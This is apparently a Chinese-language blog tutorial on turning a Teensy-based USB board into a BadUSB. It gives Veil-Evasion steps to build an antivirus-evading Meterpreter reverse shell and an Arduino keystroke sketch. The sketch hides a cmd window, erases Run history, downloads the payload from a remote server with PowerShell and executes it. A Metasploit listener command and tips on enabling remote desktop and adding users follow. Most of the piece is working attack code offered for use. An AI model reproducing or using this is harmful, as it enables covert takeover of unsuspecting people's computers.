利用烧鹅制作简单BadUSB,插谁谁怀孕

所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。

使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。

0x1 利用veil编码打造免杀的meterpreter

root@kali:~# veil-evasion //启动veil

[>] Please enter a command: list //查看可选列表

26) python/meterpreter/rev_tcp

291520197195629

[>] Please enter a command: 26 //这里选择编号为26的payload

[>] Please enter a command: set LHOST 192.168.31.233 //设置LHOST

[>] Please enter a command: generate //对payload进行编码

291520197195629

[*] Press [enter] for ‘payload’

[>] Please enter the base name for output files: a //输入生成的payload名字

[>] Please enter the number of your choice: 1 //选择编码方式

291521479548552

[*] Executable written to: /root/veil-output/compiled/a1.exe //生成经过编码的payload位置

0x2 将执行代码写入badusb中

使用Arduino IDE 写入,其中下载使用的是PowerShell,如果使用vbs那种方法,360会报警.

 

[php]void setup() { //初始化,这里的代码只执行一次</code></div>
<div class="line number2 index1 alt1"><code class="ps spaces">    
</code><code class="ps plain">delay(5000); //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。</code></div>
<div class="line number3 index2 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键</code></div>
<div class="line number4 index3 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_key1(KEY_R); // 同时按下R键</code></div>
<div class="line number5 index4 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.send_now(); // 发送Win+R</code></div>
<div class="line number6 index5 alt1"><code class="ps spaces">    
</code><code class="ps plain">delay(100);</code></div>
<div class="line number7 index6 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.print(</code><code class="ps string">"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"</code><code class="ps plain">);</code></div>
<div class="line number8 index7 alt1"><code class="ps spaces">    
</code><code class="ps plain">//开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的</code></div>
<div class="line number9 index8 alt2"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.set_key1(KEY_ENTER);</code></div>
<div class="line number10 index9 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.send_now();</code></div>
<div class="line number11 index10 alt2"><code class="ps spaces">    
</code><code class="ps plain">delay(300);</code></div>
<div class="line number12 index11 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.println(</code><code class="ps string">"reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"</code>
<code class="ps plain">); //利用注册表清除开始–运行的记录</code></div>
<div class="line number13 index12 alt2"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.set_key1(KEY_ENTER);</code></div>
<div class="line number14 index13 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.send_now();</code></div>
<div class="line number15 index14 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.println(</code><code class="ps string">"powershell (new- object System.Net.WebClient).DownloadFile(‘http://192.168.1.100 /a1.exe’,’D:\\1.exe’)"</code><code class="ps plain">); //下载远程的payload</code></div>
<div class="line number16 index15 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_key1(KEY_ENTER);</code></div>
<div class="line number17 index16 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.send_now();</code></div>
<div class="line number18 index17 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_modifier(0);</code></div>
<div class="line number19 index18 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_key1(0);</code></div>
<div class="line number20 index19 alt1"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.send_now();</code></div>
<div class="line number21 index20 alt2"><code class="ps spaces">    
</code><code class="ps plain">delay(3000); //设置延迟,等待下载完成</code></div>
<div class="line number22 index21 alt1"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.println(</code><code class="ps string">"d:\\1.exe"</code><code class="ps plain">); //执行打开命令</code></div>
<div class="line number23 index22 alt2"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.set_key1(KEY_ENTER);</code></div>
<div class="line number24 index23 alt1"><code class="ps spaces">   
 </code><code class="ps plain">delay(300);</code></div>
<div class="line number25 index24 alt2"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_modifier(0);</code></div>
<div class="line number26 index25 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_key1(0);</code></div>
<div class="line number27 index26 alt2"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.set_modifier(MODIFIERKEY_ALT);</code></div>
<div class="line number28 index27 alt1"><code class="ps spaces">    
</code><code class="ps plain">Keyboard.set_key1(KEY_SPACE);</code></div>
<div class="line number29 index28 alt2"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.set_key2(KEY_C);</code></div>
<div class="line number30 index29 alt1"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.send_now();</code></div>
<div class="line number31 index30 alt2"><code class="ps spaces">  
  </code><code class="ps plain">Keyboard.set_modifier(0);</code></div>
<div class="line number32 index31 alt1"><code class="ps spaces">  
  </code><code class="ps plain">Keyboard.set_key1(0);</code></div>
<div class="line number33 index32 alt2"><code class="ps spaces">  
  </code><code class="ps plain">Keyboard.set_key2(0);</code></div>
<div class="line number34 index33 alt1"><code class="ps spaces">   
 </code><code class="ps plain">Keyboard.send_now(); //关闭cmd窗口}void loop() //循环,这里的代码无限循环{}[/php]

 

0x3 等待目标连接

[php] msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //开始监听,等待连接[/php]

291524401889236

将USB插入目标机器,执行相关命令 目标机器上线

PS:玩法还有很多,还可以开启目标机器3389,新建用户等等

文 / Aex
LEAVE A REPLY
loading